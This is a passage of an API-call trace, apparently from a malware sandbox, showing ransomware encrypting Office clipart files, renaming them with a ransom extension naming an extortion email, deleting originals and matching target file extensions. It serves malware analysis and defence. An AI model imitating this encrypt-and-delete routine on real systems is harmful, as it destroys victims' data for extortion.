Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0056.802] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00442_.wmf")) returned 1 [0057.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 63 [0057.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 63 [0057.848] lstrlenW (lpString=".doc") returned 4 [0057.848] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0057.848] lstrlenW (lpString=".docx") returned 5 [0057.848] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0057.848] lstrlenW (lpString=".pdf") returned 4 [0057.848] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0057.848] lstrlenW (lpString=".xls") returned 4 [0057.848] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0057.848] lstrlenW (lpString=".xlsx") returned 5 [0057.848] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0057.848] lstrlenW (lpString=".ppt") returned 4 [0057.848] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0057.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 63 [0057.849] lstrlenW (lpString=".zip") returned 4 [0057.849] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0057.849] lstrlenW (lpString=".rar") returned 4 [0057.849] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0057.849] lstrlenW (lpString=".bz2") returned 4 [0057.849] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0057.849] lstrlenW (lpString=".7z") returned 3 [0057.849] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0057.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 63 [0057.849] lstrlenW (lpString=".dbf") returned 4 [0057.849] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0057.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 63 [0057.849] lstrlenW (lpString=".1cd") returned 4 [0057.849] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0057.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 63 [0057.849] lstrlenW (lpString=".jpg") returned 4 [0057.849] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0058.698] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0059.010] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0059.010] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01634_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0059.011] GetLastError () returned 0x0 [0059.011] ReadFile (in: hFile=0x158, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0xda6, lpOverlapped=0x0) returned 1 [0059.012] WriteFile (in: hFile=0x1fc, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xdb0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xdb0, lpOverlapped=0x0) returned 1 [0059.013] ReadFile (in: hFile=0x158, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0059.013] WriteFile (in: hFile=0x1fc, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0059.013] SetEndOfFile (hFile=0x1fc) returned 1 [0059.013] CloseHandle (hObject=0x1fc) returned 1 [0059.013] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0059.014] SetEndOfFile (hFile=0x158) returned 1 [0059.014] CloseHandle (hObject=0x158) returned 1 [0059.014] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0059.014] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01634_.wmf")) returned 1 [0059.015] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 63 [0059.015] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 63 [0059.015] lstrlenW (lpString=".doc") returned 4 [0059.015] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0059.015] lstrlenW (lpString=".docx") returned 5 [0059.015] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0059.015] lstrlenW (lpString=".pdf") returned 4 [0059.015] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0059.015] lstrlenW (lpString=".xls") returned 4 [0059.015] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0059.015] lstrlenW (lpString=".xlsx") returned 5 [0059.015] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0059.015] lstrlenW (lpString=".ppt") returned 4 [0059.015] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0059.015] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 63 [0059.015] lstrlenW (lpString=".zip") returned 4 [0059.015] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0059.015] lstrlenW (lpString=".rar") returned 4 [0059.015] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0059.015] lstrlenW (lpString=".bz2") returned 4 [0059.015] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0059.015] lstrlenW (lpString=".7z") returned 3 [0059.015] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0059.015] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 63 [0059.015] lstrlenW (lpString=".dbf") returned 4 [0059.015] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0059.015] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 63 [0059.015] lstrlenW (lpString=".1cd") returned 4 [0059.015] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0059.016] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 63 [0059.016] lstrlenW (lpString=".jpg") returned 4 [0059.016] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0059.016] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0059.016] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0059.016] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00261_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0059.016] GetLastError () returned 0x0 [0059.016] ReadFile (in: hFile=0x158, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x9456, lpOverlapped=0x0) returned 1 [0059.018] WriteFile (in: hFile=0x1fc, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x9460, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x9460, lpOverlapped=0x0) returned 1 [0059.020] ReadFile (in: hFile=0x158, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0059.020] WriteFile (in: hFile=0x1fc, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0059.020] SetEndOfFile (hFile=0x1fc) returned 1 [0059.020] CloseHandle (hObject=0x1fc) returned 1 [0059.020] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0059.020] SetEndOfFile (hFile=0x158) returned 1 [0059.021] CloseHandle (hObject=0x158) returned 1 [0059.021] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0059.021] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00261_.wmf")) returned 1 [0059.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 63 [0059.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 63 [0059.022] lstrlenW (lpString=".doc") returned 4 [0059.022] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0059.022] lstrlenW (lpString=".docx") returned 5 [0059.022] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0059.022] lstrlenW (lpString=".pdf") returned 4 [0059.022] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0059.022] lstrlenW (lpString=".xls") returned 4 [0059.022] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0059.022] lstrlenW (lpString=".xlsx") returned 5 [0059.022] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0059.022] lstrlenW (lpString=".ppt") returned 4 [0059.022] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0059.022] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 63 [0059.022] lstrlenW (lpString=".zip") returned 4 [0059.022] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0059.022] lstrlenW (lpString=".rar") returned 4 [0059.022] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0059.022] lstrlenW (lpString=".bz2") returned 4 [0059.022] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0059.022] lstrlenW (lpString=".7z") returned 3 [0059.023] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0059.023] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 63 [0059.023] lstrlenW (lpString=".dbf") returned 4 [0059.023] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0059.023] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 63 [0059.023] lstrlenW (lpString=".1cd") returned 4 [0059.023] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0059.023] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 63 [0059.023] lstrlenW (lpString=".jpg") returned 4 [0059.023] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0059.023] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0059.023] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0059.023] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00297_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0059.024] GetLastError () returned 0x0 [0059.024] ReadFile (in: hFile=0x158, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x9c5e, lpOverlapped=0x0) returned 1 [0059.026] WriteFile (in: hFile=0x1fc, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x9c60, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x9c60, lpOverlapped=0x0) returned 1 [0059.027] ReadFile (in: hFile=0x158, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0059.027] WriteFile (in: hFile=0x1fc, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0059.027] SetEndOfFile (hFile=0x1fc) returned 1 [0059.027] CloseHandle (hObject=0x1fc) returned 1 [0059.027] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0059.027] SetEndOfFile (hFile=0x158) returned 1 [0059.028] CloseHandle (hObject=0x158) returned 1 [0059.028] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0059.028] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00297_.wmf")) returned 1 [0059.029] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 63 [0059.029] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 63 [0059.029] lstrlenW (lpString=".doc") returned 4 [0059.029] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0059.029] lstrlenW (lpString=".docx") returned 5 [0059.029] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0059.029] lstrlenW (lpString=".pdf") returned 4 [0059.029] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0059.029] lstrlenW (lpString=".xls") returned 4 [0059.029] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0059.029] lstrlenW (lpString=".xlsx") returned 5 [0059.029] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0059.029] lstrlenW (lpString=".ppt") returned 4 [0059.029] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0059.029] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 63 [0059.029] lstrlenW (lpString=".zip") returned 4 [0059.029] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0059.029] lstrlenW (lpString=".rar") returned 4 [0059.029] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0059.029] lstrlenW (lpString=".bz2") returned 4 [0059.029] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0059.029] lstrlenW (lpString=".7z") returned 3 [0059.029] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0059.029] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 63 [0059.029] lstrlenW (lpString=".dbf") returned 4 [0059.029] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0059.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 63 [0059.030] lstrlenW (lpString=".1cd") returned 4 [0059.030] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0059.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 63 [0059.030] lstrlenW (lpString=".jpg") returned 4 [0059.030] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0059.030] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0059.031] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0059.031] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00372_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0059.031] GetLastError () returned 0x0 [0059.031] ReadFile (in: hFile=0x158, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x318, lpOverlapped=0x0) returned 1 [0059.032] WriteFile (in: hFile=0x1fc, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x320, lpOverlapped=0x0) returned 1 [0059.033] ReadFile (in: hFile=0x158, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0059.033] WriteFile (in: hFile=0x1fc, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0059.033] SetEndOfFile (hFile=0x1fc) returned 1 [0059.033] CloseHandle (hObject=0x1fc) returned 1 [0059.033] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0059.033] SetEndOfFile (hFile=0x158) returned 1 [0059.034] CloseHandle (hObject=0x158) returned 1 [0059.034] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0059.034] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00372_.wmf")) returned 1 [0059.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 63 [0059.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 63 [0059.035] lstrlenW (lpString=".doc") returned 4 [0059.035] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0059.035] lstrlenW (lpString=".docx") returned 5 [0059.035] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0059.035] lstrlenW (lpString=".pdf") returned 4 [0059.035] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0059.035] lstrlenW (lpString=".xls") returned 4 [0059.035] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0059.035] lstrlenW (lpString=".xlsx") returned 5 [0059.035] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0059.035] lstrlenW (lpString=".ppt") returned 4 [0059.035] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0059.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 63 [0059.035] lstrlenW (lpString=".zip") returned 4 [0059.035] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0059.035] lstrlenW (lpString=".rar") returned 4 [0059.035] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0059.035] lstrlenW (lpString=".bz2") returned 4 [0059.035] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0059.035] lstrlenW (lpString=".7z") returned 3 [0059.035] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0059.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 63 [0059.035] lstrlenW (lpString=".dbf") returned 4 [0059.035] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0059.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 63 [0059.035] lstrlenW (lpString=".1cd") returned 4 [0059.035] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0059.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 63 [0059.035] lstrlenW (lpString=".jpg") returned 4 [0059.036] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0059.036] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0059.036] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0059.036] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00405_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0059.036] GetLastError () returned 0x0 [0059.036] ReadFile (in: hFile=0x158, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x44b0, lpOverlapped=0x0) returned 1 [0059.038] WriteFile (in: hFile=0x1fc, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x44c0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x44c0, lpOverlapped=0x0) returned 1 [0059.039] ReadFile (in: hFile=0x158, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0059.039] WriteFile (in: hFile=0x1fc, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0059.039] SetEndOfFile (hFile=0x1fc) returned 1 [0059.039] CloseHandle (hObject=0x1fc) returned 1 [0059.039] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0059.039] SetEndOfFile (hFile=0x158) returned 1 [0059.040] CloseHandle (hObject=0x158) returned 1 [0059.040] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0059.040] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00405_.wmf")) returned 1 [0059.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 63 [0059.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 63 [0059.041] lstrlenW (lpString=".doc") returned 4 [0059.041] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0059.041] lstrlenW (lpString=".docx") returned 5 [0059.041] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0059.041] lstrlenW (lpString=".pdf") returned 4 [0059.041] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0059.041] lstrlenW (lpString=".xls") returned 4 [0059.041] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0059.041] lstrlenW (lpString=".xlsx") returned 5 [0059.041] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0059.041] lstrlenW (lpString=".ppt") returned 4 [0059.041] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0059.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 63 [0059.041] lstrlenW (lpString=".zip") returned 4 [0059.041] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0059.041] lstrlenW (lpString=".rar") returned 4 [0059.041] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0059.041] lstrlenW (lpString=".bz2") returned 4 [0059.041] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0059.041] lstrlenW (lpString=".7z") returned 3 [0059.041] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0059.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 63 [0059.041] lstrlenW (lpString=".dbf") returned 4 [0059.041] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0059.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 63 [0059.041] lstrlenW (lpString=".1cd") returned 4 [0059.041] lstrcmpiW (lpString1=".1cd", 